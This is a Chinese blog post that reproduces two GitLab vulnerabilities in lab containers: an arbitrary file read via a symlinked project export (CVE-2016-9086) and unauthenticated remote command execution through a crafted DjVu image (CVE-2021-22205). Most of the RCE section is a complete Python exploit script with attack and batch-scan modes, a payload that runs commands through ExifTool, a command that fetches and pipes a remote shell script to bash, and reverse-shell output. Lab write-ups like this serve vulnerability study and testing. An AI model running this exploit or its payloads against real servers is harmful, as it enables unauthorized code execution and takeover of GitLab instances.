首页 > 其他分享 >Vulhub 漏洞学习之:Gitlab

Vulhub 漏洞学习之:Gitlab

时间:2023-05-05 22:00:18浏览次数:49  
标签:Vulhub __ GitLab target url Gitlab 漏洞 x00

Vulhub 漏洞学习之:Gitlab

目录

1 GitLab 任意文件读取漏洞(CVE-2016-9086)

GitLab是一款Ruby开发的Git项目管理平台。在8.9版本后添加的“导出、导入项目”功能,因为没有处理好压缩包中的软连接,已登录用户可以利用这个功能读取服务器上的任意文件。

参考链接:

1.1 环境安装

执行如下命令启动一个GitLab Community Server 8.13.1:

docker-compose up -d

环境运行后,访问http://your-ip:8080即可查看GitLab主页,其ssh端口为10022,默认管理员账号、密码是rootvulhub123456

1.2 漏洞利用过程

  1. 漏洞原理:project.json为软链接,指向/etc/passwdGitLab 任意文件读取漏洞 (CVE-2016-9086) 和任意用户 token 泄露漏洞 (seebug.org)

    image-20230430151638688

  2. 注册并登录用户,新建一个项目,点击GitLab export

    image-20230429094039674

  3. 在导入页面,将test.tar.gz上传,将会读取到/etc/passwd文件内容:

    image-20230429093952788

2 GitLab 远程命令执行漏洞(CVE-2021-22205)

GitLab是一款Ruby开发的Git项目管理平台。在11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行任意命令。

参考链接:

2.1 环境安装

执行如下命令启动一个GitLab 13.10.1版本服务器:

docker-compose up -d
  • 环境启动后,访问http://your-ip:8080即可查看到GitLab的登录页面。

2.2 漏洞利用过程

2.2.1 脚本复现

  1. POC: GitHub - Al1ex/CVE-2021-22205: CVE-2021-22205& GitLab CE/EE RCE

  2. GitLab的/uploads/user接口可以上传图片且无需认证,利用poc脚本来测试这个漏洞:

    import requests
    from bs4 import BeautifulSoup
    import base64
    import random
    import sys
    import os
    import argparse
    
    requests.packages.urllib3.disable_warnings()
    
    def title():
        print("""
    	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
    	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
    	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
    	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
     	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
    
     	                                Author:Al1ex@Heptagram
                                    Github:https://github.com/Al1ex                             
        	""")
        print('''
            验证模式:python CVE-2021-22205.py -v true -t target_url 
            攻击模式:python CVE-2021-22205.py -a true -t target_url -c command 
            批量检测:python CVE-2021-22205.py -s true -f file 
            ''')    
    
    def check(target_url):
        session = requests.Session()
        try:
            req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False)
            soup = BeautifulSoup(req1.text, features="lxml")
            token = soup.findAll('meta')[16].get("content")
            data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") )                                                                                                                                                                                                                                                                                                                                                                                                                                     \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
            headers = {
                "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
                "Connection": "close",
                "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
                "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"}
            flag = 'Failed to process image'
            req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
            if flag in req2.text:
                print("[+] 目标 {} 存在漏洞".format(target_url))
            else:
                print("[-] 目标 {} 不存在漏洞".format(target_url))
        except Exception as e:
            print(e)
    
    def attack(target_url,command):
        session = requests.Session()
        try:
            req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False)
            soup = BeautifulSoup(req1.text, features="lxml")
            token = soup.findAll('meta')[16].get("content")
            data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+  command +"} . \\\n\" b \") )                                                                                                                                                                                                                                                                                                                                                                                                                                     \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
            headers = {
                "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
                "Connection": "close",
                "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
                "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"}
            flag = 'Failed to process image'
            req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
            if flag in req2.text:
                print("[+] 目标 {} 存在漏洞".format(target_url))
                print("[+] 请到dnslog或主机检查执行结果")
            else:
                print("[-] 目标 {} 不存在漏洞".format(target_url))
        except Exception as e:
            print(e)
    
    def scan(file):
        for url_link in open(file, 'r', encoding='utf-8'):
                if url_link.strip() != '':
                    url_path = format_url(url_link.strip())
                    check(url_path)
    
    def format_url(url):
        try:
            if url[:4] != "http":
                url = "https://" + url
                url = url.strip()
            return url
        except Exception as e:
            print('URL 错误 {0}'.format(url))    
    
    def main():
        parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
        parser.add_argument('-v', '--verify', type=bool,help=' 验证模式 ')
        parser.add_argument('-t', '--target', type=str, help=' 目标URL ')
    
        parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ')
        parser.add_argument('-c', '--command', type=str, help=' 执行命令 ')
    
        parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
        parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')
    
    
        args = parser.parse_args()
    
        verify_model = args.verify
        target_url   = args.target
    
        attack_model = args.attack
        command = args.command
    
        scan_model = args.scan
        file = args.file
    
        if verify_model is True and target_url !=None:
            check(target_url)
        elif attack_model is True and target_url != None and command != None:
            attack(target_url,command)
        elif scan_model is True and file != None:
            scan(file)
        else:
            sys.exit(0)   
    
    if __name__ == '__main__':
        title()
        main()
    
  3. python .\gitlab.py -a true -t http://192.168.50.4:47177 -c "curl 192.168.50.2/shell.sh | bash"

    ┌──(root㉿kali)-[~/Desktop]
    └─# python3 -m http.server 80
    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
    192.168.50.4 - - [05/May/2023 02:28:21] "GET /shell.sh HTTP/1.1" 200 -
    
  4. Getshell

    ┌──(root㉿kali)-[~/Desktop]
    └─# nc -nvlp 2333
    listening on [any] 2333 ...
    connect to [192.168.50.2] from (UNKNOWN) [192.168.50.4] 36370
    bash: cannot set terminal process group (1200): Inappropriate ioctl for device
    bash: no job control in this shell
    git@33b3b668fd05:~/gitlab-workhorse$ id
    id
    uid=998(git) gid=998(git) groups=998(git)
    

2.2.2 手动复现

  1. vulhub有问题,使用的是vulfocus靶场复现。

  2. DjVu格式图片制作工具下载:DjVuLibre: Open Source DjVu library and viewer (sourceforge.net)

  3. 准备好你的EXP:

    (metadata
    	(Copyright "\
    " . qx{curl .dnslog.cn} . \
    " b ") )
    
    (metadata
    	(Copyright "\
    " . qx{curl 192.168.50.2/shell.sh | bash} . \
    " b ") )
    
  4. kali中制作EXP 图片: djvumake rce.djvu INFO=0,0 BGjp=/dev/null ANTa=rce.txt && mv rce.djvu rce.jpg

  5. 注册个用户并登录,在头像处选择:Profile-->Snippets-->New Snippet,在Description的Attach a file处上传DjVu格式图片rce.jpg

  6. 成功反弹shell:

    ┌──(root㉿kali)-[~/Desktop]
    └─# nc -nvlp 2333
    listening on [any] 2333 ...
    connect to [192.168.50.2] from (UNKNOWN) [192.168.50.4] 37066
    bash: cannot set terminal process group (1189): Inappropriate ioctl for device
    bash: no job control in this shell
    git@4e4a8d28cc53:~/gitlab-workhorse$ id
    id
    uid=998(git) gid=998(git) groups=998(git)
    git@4e4a8d28cc53:~/gitlab-workhorse$
    

标签:Vulhub,__,GitLab,target,url,Gitlab,漏洞,x00
From: https://www.cnblogs.com/f-carey/p/17375484.html

相关文章

  • gitlab--python 操作 gitlab
    安装我们可以使用python-gitlab库来操作gitlabpipinstallpython-gitlabgitlabissue查询的api:https://docs.gitlab.com/ee/api/issues.html#list-issuesgitlabissue查询的api:https://docs.gitlab.com/ee/api/issues.html#list-issues创建令牌我们需要令牌进行访问......
  • GitLab + Jenkins 实现持续集成CI
      1软件版本2基础环境安装2.1docker 安装yuminstall-ydocker-ce-20.10.16 systemctlstartdocker&&systemctlenabledocker   dockerversion  2.2docker-compose安装curl-Lhttps://get.daocloud.io/docker/compose/releases/download/1.29.2/......
  • 《渗透测试》WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性 2022 Day31
     1、文件上传-前端验证2、文件上传-黑白名单3、文件上传-user.ini妙用4、文件上传-PHP语言特性 前置:后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门#详细点:1、检测层面:前......
  • 信息搜集与漏洞扫描
    信息搜集与漏洞扫描基础问题回答哪些组织负责DNS,IP的管理。ICANN(Internet域名与地址管理机构)负责全球的DNS、IP和域名根服务器的管理,是为承担域名系统管理IP地址分配,协议参数配置,以及主服务器系统管理等职能而设立的非盈利机构。全球一共有5个地区性注册机构:ARIN主要负责北......
  • Windows漏洞更新地址
    Windows漏洞更新地址https://www.catalog.update.microsoft.com/ 例如修复编号:KB5025285  ......
  • gitlab的主分支由master改为main后,怎么初始化项目
    1.如果从来没有在当前电脑添加git账户,则gitconfig--globaluser.name'用户名'gitconfig--globaluser.email'邮箱'2.初始化gitinit3.与远程仓库建立联系gitremoteaddorigin你的代码地址4.先拉一下代码gitpull--rebase originmain5.修改分支名称(如果先修改,......
  • cPanel XSS漏洞分析研究(CVE-2023-29489)
    一、漏洞原理漏洞简述cPanel是一套在网页寄存业中最享负盛名的商业软件,是基于于Linux和BSD系统及以PHP开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail及多种电邮协议、网页化FTP管理、SSH连线、数据库管理系统、DNS管理等远端网页式主机管......
  • Gitlab CI + Dotnet6
    1.DockerfileFROMmcr.microsoft.com/dotnet/aspnet:6.0WORKDIR/appEXPOSE80EXPOSE443COPY/app/publish.ENTRYPOINT["dotnet","coreqi_api.dll"]2.[.gitlab-ci.yml]stages:-build-project-build-docker-deployvariables:......
  • CVE-2021-27239 漏洞复现
    在此感谢tolele师傅的帮助参考链接https://toleleyjl.github.io/2023/04/09/CVE-2021-27239%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E8%AE%B0%E5%BD%95/https://toleleyjl.github.io/2023/02/16/CVE-2021-34991%E5%A4%8D%E7%8E%B0/https://xuanxuanblingbling.github.io/io......
  • 实验四:WinRAR漏洞
    【实验目的】通过打开rar文件,获取到目标机shell。【知识点】winrar漏洞【实验原理】该漏洞是由于WinRAR所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006年被编译,没有任何的基础保护机制(ASLR,DEP等)。该动态链接库的作用是处理ACE格式文件。而在解压处理......